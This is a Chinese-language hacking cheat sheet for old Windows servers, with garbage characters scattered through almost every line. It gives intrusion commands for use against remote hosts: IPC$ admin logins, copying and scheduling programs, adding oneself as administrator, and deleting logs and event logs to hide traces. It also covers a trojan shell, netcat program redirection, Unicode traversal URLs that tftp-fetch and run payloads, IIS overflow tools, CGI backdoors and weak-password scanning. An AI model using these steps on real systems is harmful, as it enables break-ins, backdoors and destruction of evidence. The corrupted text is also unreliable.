网管和黑客都必须知道的命令
�/j��.��/ 常用的几条NET命令:
?l�tTJ(P�o "JAYTatO7H (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�*PE�1)�bF kVw5z�3]Xg (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
_)Q)�tOW�� �v0��|A�
N (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
,xB&�{�J�� ;�oV�d�kp� (查看远程主机时间) net time \\IP地址
E��"bY��l3 R_\{a�*lV0 (定时启动某个程序) at \\IP地址 02:18 readme.exe
�szMh}q"�u fL�L_{o0T� (查看共享) net view \\IP地址
�n�;Tpf<*U q17c)��]<" (查看netbios工作组列表) nbtstat -A IP地址
:��\�L��{S �e�X7Ev'(H (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
z:b��xnM2\ EcrM`E#kaZ (这两条把自己增加到管理员组): net user 用户名 密码 /add
rA&|!�1q"B Yv�E$fX=�� net localgroup Administrators 用户名 /add
;�$l!mv��7 �a \B<(R�. (断开连接) net use \\IP地址\ipc$ /delete
�/4+M0P�l� AJ[g~�s'�t 扫尾:
��G!�T)V2y v��C[)�/w� del C:\winnt\system32\logfiles\*.*
Cq;t;qN,nQ |;ycEB1�� del C:\winnt\ssytem32\config\*.evt
"2�(lgx�hj Lg��pj<H�[ del C:\winnt\system32\dtclog\*.*
B�x�0^�?> 5c(�$3Pno= del C:\winnt\system32\*.log
>3s9vdUp4h E8J��`7sa del C:\winnt\system32\*.txt
��n��^'ip{ zI8��Q� "b del C:\winnt\*.txt
)VQ:�L:1t( RxU6��.5N� del C:\winnt\*.log
7�g}�4gX's [tym~ZZ]_m 一、netsvc.exe
, fFB.�q"
1i4KZ"A�5+ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
\ F#mwl,>" dN\Byl(��6 netsvc /list \\IP地址
frbKi �_�1 ]2�4aK_�Uu netsvc schedule \\IP地址 /query
n(�l!T
��7 �'�A
.c*<_ netsvc \\IP地址 schedule /start
�$�r�*7)/� |�`_qmk[:R 二、OpenTelnet.exe
yj�vzA|(YC q]YPD�d�R# 远程启动主机的Telnet服务,并绑定端口到7878,例如:
]�?S\�S�o+ �gN�1b?�_g OpenTelnet \\IP地址 用户名 密码 1 7878
<KqZ.7�XfB h2ewYe<87` 然后就可以telnet到主机的7878端口,进入DOS方式下:
z�:-a�7_�� f1�(V~{N,+ telnet IP地址 7878
U��h��YeyT �*Uie{�^p? 三、winshell.exe
A\iDK�10Q$ f���s+��l� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�<8yzBp4gZ =Ig'Aw$�x� p Path (查看winshell主程序的路径信息)
�ty[b�IaQi W!8g.r4u+, b reBoot (重新启动机器)
�$D
+�6=m[ �U*�`7� �� d shutDown (关闭机器)
]�+��;1)�� ����}��tv% s Shell (执行后你就会看到可爱的“C:\>”)
%l�%�5Q;t c�e th�)Xm x eXit (退出本次登录会话,此命令并不终止winshell的运行)
u"�XqWLTV� a�_XM2d�c% CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�/u�S(Z-�@ >;kCcfS3ct 四、3389登陆器,GUI方式登录远程主机的
z=:�<�]j#= ,IoPK!�5xy 五、elsave.exe
RX�8��$&�z W#87T_7T�[ 事件日志清除工具
By��(:�%=. �2.Cj��j�I elsave -s \\IP地址 -l "application" -C
�Y�h)y�p? /=I&-�g�xC elsave -s \\IP地址 -l "system" -C
�h~haA8i?{ �c�ZI �)lX elsave -s \\IP地址 -l "security" -C
..6 : _{wg �}VxbO8\b( 执行后成功清除应用程序日志,系统日志,安全日志
Dw{rjK\TT' L&M6s
f$�N 六、hbulot.exe
rStf�luPL n�lJ~Q�_E( 开启win2kserver和winxp的3389服务
^N}�zePy�0 �/�3-�>T�S hbulot [/r]
:�Y/i%#*1� ^�_ <jg�0V 使用/r表示安装完成后自动重起目标使设置生效。
ON#\�W>MK? {WU�W.(^]G 七、nc.exe(netcat.exe)
P5/K?I~/So ^(�y��=DJ7 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
Ci6yH( �RE <Z5ak4�P�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
Q�<W9<&VZe CY�;M�L6c@ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�0�jC�YO�l :acnrW>i[@ 参数:
TJFxo?
gC" �%"^$$$6�% -e prog 程序重定向,一旦连接,就执行 [危险!!]
n�^P�=a'+� �wLwAt�jW) -g gateway source-routing hop point[s], up to 8
RN\4y��{@� fTiqY72h�� -G num source-routing pointer: 4, 8, 12, ...
7NC"}�JB& ���'U
',�9 -h 帮助信息
��Wm�U4~.� �{N1Ss|��6 -i secs 延时的间隔
p�48M7O��V YB�n"9w\#� -l 监听模式,用于入站连接
>B�(%$jG Z eq.K77El{J -n 指定数字的IP地址,不能用hostname
3�qOq:ZkQ� ~$XbY�R-�� -o file 记录16进制的传输
>m='#x0>Y )&:4//}�a� -p port 本地端口号
ULc� oti=, �#m�g6F�$E -r 任意指定本地及远程端口
3 E��H�/6� dr�0<K[S�_ -s addr 本地源地址
P5s'cP���X 0,+�RF��"R -u UDP模式
�v}p'vh^8B �:�l>&�5w; -v 详细输出——用两个-v可得到更详细的内容
*y[�i~{7�: JU+U�z�p � -w secs timeout的时间
�B:S/�
�?v {<0=y#@u�� -z 将输入输出关掉——用于扫描时
�I>ks��� H 八、TFTPD32.EXE
3�wZA,�Z
M{�I8b<hY 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
3YT>3f!�\
ol]"r5#Q_H http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�J��J��@O5 �gwE#,�OY* 然后可以直接令文件运行:
,]�HH%/�h
,'[�L�6=# http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
l��M�
]�n� LWgYGXWT�" 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
XnC`JO+7M� ,b;�eU[�!] 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�sLi�KcR8^ �0�>h�V?�A 一、一 Xscan命令行运行参数说明:
���k(���l� %oVoE�2T{@ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�.ko8`J%%M V�Z�"W_U,� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�W,�&z:�z> 1haH2F^�q3 xscan -file <主机列表文件名> <检测项目> [其他选项]
dI���k/vg �uNn���x
i 其中<检测项目> 含义如下:
=#�)Zm?[; �A[20ic�� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�/ J ��3�� s�5{N+O)~S -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
8��W��' ,T \ux�D��MKy -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
���]pUf[^4 d�H4wyd�`� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�p��qmb&"l �EHpIb�j;n -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�[�@�E�xR* �4o7��(�cP [其他选项] 含义如下:
^rF{�%1�DT 3I0=�^��>A -v: 显示详细扫描进度
}.md�$N_�F [�"4sCB@Tr -p: 跳过Ping不通的主机
yZ7aH|Q81B 9
Yv;D��om -o: 跳过没有检测到开放端口的主机
tbz?th\��# Rou$`<�{H� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
